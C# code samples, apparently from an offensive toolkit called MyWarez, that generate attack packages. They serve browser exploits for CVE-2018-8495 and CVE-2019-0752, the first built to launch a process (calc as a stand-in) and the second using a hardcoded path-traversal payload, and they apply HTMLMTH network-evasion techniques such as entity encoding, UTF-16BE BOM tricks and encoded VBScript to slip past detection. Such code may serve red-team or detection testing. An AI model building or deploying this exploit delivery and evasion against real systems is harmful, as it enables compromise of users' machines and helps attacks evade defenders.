private static IAttack OutputMergingExample() { // Note: This sample uses the same virtual host and port for the HTMLMTH server as the HTMLMTH server from Sample6 var HOSTNAME = "HostnameC2"; // the DNS name "HostnameC2" points to the virtual host "VirtualHostC" var VIRTUALHOST = "VirtualHostC"; // So, the host in Sample6 and Sample7 are the same virtual host var HOST = Host.GetHostByHostName(HOSTNAME) ?? new Host(VIRTUALHOST, HOSTNAME, null); var htmlmthServerOutput = new HtmlmthServerOutput(HOST, scriptEncodingServerHost: "SomeWindowsServerRunningTheEncoderScript.com", scriptEncodingServerPort: 5000); // the default port is 80 var attackName = "OutputMerging"; var attack = new Attack(new IOutput[] { htmlmthServerOutput, }, name: attackName); var website = new OnePageWebsite("<html><head><meta http-equiv=\"x-ua-compatible\" content=\"IE=8\"></head><body><script language='VBScript.Encode'>MsgBox Hex(&HBAADF00D)</script></body></html>"); var evasions = new[] { // Refer to HTMLMTH documentation & source code for the available evasions "htmlmth.evasions.html.encoded_script", // This evasion requires HTMLMTH's scripting_encoder_server.py to be running on a Windows server. This server should be reachable from the HTMLMTH server // This evasion also only works when IE rendering mode is set to <= 8 }; var htmlmthWebsite = new HtmlmthWebsite(website, HOST, evasions); htmlmthServerOutput.Add(htmlmthWebsite); // bookkeep attack.Generate(); // The files needed to launch the HTMLMTH server should now be at $(ProjectDir)\bin\$(Configuration)\$(TargetFramework)\Output\Server\HostnameB\80_HTMLMTH_Server // Note: MyWarez will automatically merge the HTMLMTH server contents correctly for HtmlmthServerOutput on the same virtual host & port // Note: The same occurs for multiple HttpServerOutput on the same virtual host & port // Note: The same occurs for multiple SmbServerOutput on the same virtual host & port // Note: The same occurs for multiple RemoteFileServerOutput on the same virtual host & port // Note: Different Output types on the same virtual host & port will NOT be merged return(attack); }
public static HtmlmthWebsite Create(string host) { // This is the baseline's payload. It is hardcoded in the baseline resource // Payload = "\..\..\..\..\..\PROGRA~2\INTERN~1\iexplore.exe 0D15EA5E" var baselineResourceName = "CVE-2019-0752_internetexplorer.html"; var baselineResourcePath = Path.Join(MyWarez.Core.Constants.ResourceDirectory, baselineResourceName); var baselineHtml = File.ReadAllText(baselineResourcePath); var baselineWebsite = new Website(new List <WebsiteResource>() { new WebsiteResource(baselineHtml, "/") }); var baselineHtmlmthWebsite = new HtmlmthWebsite(baselineWebsite, host); return(baselineHtmlmthWebsite); }
private static IAttack HtmlmthServerOutputExample() { // Note: This sample can't use HOSTNAME = HostnameB since port 80 on HostnameB is already occupied by the HTTP Server from Sample4 var HOSTNAME = "HostnameC1"; // the DNS name "HostnameC1" points to the virtual host "VirtualHostC" var VIRTUALHOST = "VirtualHostC"; var HOST = Host.GetHostByHostName(HOSTNAME) ?? new Host(VIRTUALHOST, HOSTNAME, null); var htmlmthServerOutput = new HtmlmthServerOutput(HOST); // the default port is 80 var attackName = "HtmlmthServerOutput"; var attack = new Attack(new IOutput[] { htmlmthServerOutput, }, name: attackName); // This represents a commandline used to create a new process var cmdline = new Tonsil.Processes.CmdLine() { image = @"calc", arguments = new string[] { } }; var process = new Tonsil.Processes.Process(cmdline); // List of commandlines var processList = new ProcessList(new[] { process }); // Note: this exploit enforces a ProcessList size of size 1 var exploitWebsite = new CVE_2018_8495(processList); // Network Evasions to apply to the delivery of the exploit var exploitEvasions = new[] { // Refer to HTMLMTH documentation & source code for the available evasions "htmlmth.evasions.html.entity_encoding_attributes_dec", "htmlmth.evasions.html.external_resource_internal_script", "htmlmth.evasions.html.insert_slash_after_opening_tag_names", "htmlmth.evasions.html.bom_declared_utf_16be_encoded_as_utf_16_be" }; // HtmlmthWebsite represents the HTTP resource(s) hosted by HTMLMTH server var exploitHtmlmthWebsite = new HtmlmthWebsite(exploitWebsite, HOST, exploitEvasions); // Dont forget to bookkeep htmlmthServerOutput.Add(exploitHtmlmthWebsite); attack.Generate(); // The files needed to launch the HTMLMTH server should now be at $(ProjectDir)\bin\$(Configuration)\$(TargetFramework)\Output\Server\HostnameB\80_HTMLMTH_Server return(attack); }